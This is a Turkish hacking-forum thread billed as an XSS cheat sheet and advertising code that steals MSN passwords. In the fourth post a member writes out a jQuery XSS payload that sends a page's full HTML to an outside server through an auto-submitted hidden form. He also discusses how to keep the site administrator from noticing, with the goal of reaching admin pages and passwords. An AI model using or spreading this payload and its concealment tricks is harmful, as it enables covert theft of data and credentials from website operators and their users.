İPUCU

Sosyal medya ve Sosyal Platformlar Sosyal Medya Ve Sosyal Platformlar Hakkında Her şey.

Seçenekler

XSS (Cross Site Scripting) Cheat Sheet//işte msn sifrelerini çalan java kodları

criminal king - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
Ottawa
Mesajlar:
1.451
Konular:
313
Teşekkür (Etti):
107
Teşekkür (Aldı):
247
Ticaret:
(0) %
14-06-2012 12:49
#1
Arrow
XSS (Cross Site Scripting) Cheat Sheet//işte msn sifrelerini çalan java kodları
XSS Cross Site Scripting olduğunu. XSS (Cross Site Scripting) nasıl çalıştığını bilmiyorsanız, bu site belki size yardımcı olmayacaktır. Bu sayfa zaten XSS saldırılarının temellerini anlamak, filtre kaçırma ile ilgili nüanslar derin bir anlayış isteyenler içindir.
Ayrıca msn bilgileride çalmaktadır.
XSS (Cross Site Scripting) Cheat Sheet
--------------------- Hayat Korkakları Affetmez!
Konu criminal king tarafından (14-06-2012 12:51 Saat 12:51 ) değiştirilmiştir.
criminal king - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
Ottawa
Mesajlar:
1.451
Konular:
313
Teşekkür (Etti):
107
Teşekkür (Aldı):
247
Ticaret:
(0) %
14-06-2012 13:28
#2
hiç yorum yokmu?
--------------------- Hayat Korkakları Affetmez!
Nvidias - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2011
Mesajlar:
17
Konular:
1
Teşekkür (Etti):
2
Teşekkür (Aldı):
1
Ticaret:
(0) %
16-06-2012 21:34
#3
teşekkürler
hamush - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
06/2012
Mesajlar:
635
Konular:
10
Teşekkür (Etti):
72
Teşekkür (Aldı):
120
Ticaret:
(0) %
26-06-2012 21:33
#4
Hocam, benim anlayamadığım konu, bir sonraki aşama.. Mesela kendi sitelerimden birine baktım, XSS açığı var.. Kullanıcı mesajını htmlencode filan etmemişim. Yönetici mesajı onaylamak/reddetmek için görüntülediğinde birisi canının istediği scripti çağırabilir/ekleyebilir çünkü alan da TEXT, yer çok yani.. yani canının istediği kadar yazar gitsin.. Buradan yola çıksak ne yapabiliriz? Fikir verebilir misiniz?
- Eh, redirect ederiz siteyi.. Pek bir zararı olmaz. Yönetici mesajları göremez, webmaster'a haber verir, webmaster veritabanını kontrol eder, açığı görür, kapatır.
- Sanırım o andaki html kodunu bir yerlere gönderebiliriz. html kodundan da yönetici ayarları sayfasının nerede olduğunu, yönetici şifrelerinin nasıl alınacağını sanırım bir iki saldırıda buluruz. Alıcı site aynı domain'de olamayacağından ajax da kullanamayız... yeni pencere açıp kapasak popup blocker'a takılabilir.. mesela sitede jquery var ise çabucak..
Alıntı:
('body').append('<form id="ehe" action="http://hamush.com/hamush.php" method="post"><input id="icerik" type="hidden" value="'+$('body').html()+'" /></form>');$('#ehe').submit();
... desek, hamush.php ne yapmalı ki karşımızdaki saldırmakta olduğumuzu anlamasın?
Gene çözüm bulunur, mesela yukarıdaki kodun başına "********.********.hash='#s';" ekler, yukarıdaki form gönderme olmadan önce ********.********.hash'in 's' olup olmadığını kontrol ederiz, hamush.php de sadece 'history.go(-1)' yapar. Bir anlık beyaz sayfanın gelip gitmesi ihtimal site yöneticisini çok şüphelendirmez..
Şimdi nasıl devam ederiz? Aktif olarak kırmaya çalıştığım bir site yok ama, bu sistem en fazla ne kadar zarar verebilir düşünmek eğlenceli oluyor. Beyin jimnastiğime katılır ve hatalarımız düzeltirseniz beni minnettar edersiniz.
Düşünürken yazdığımdan biraz dağınık oldu ama, asıl söylemek istediğimi anlamışsınızdır umarım.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı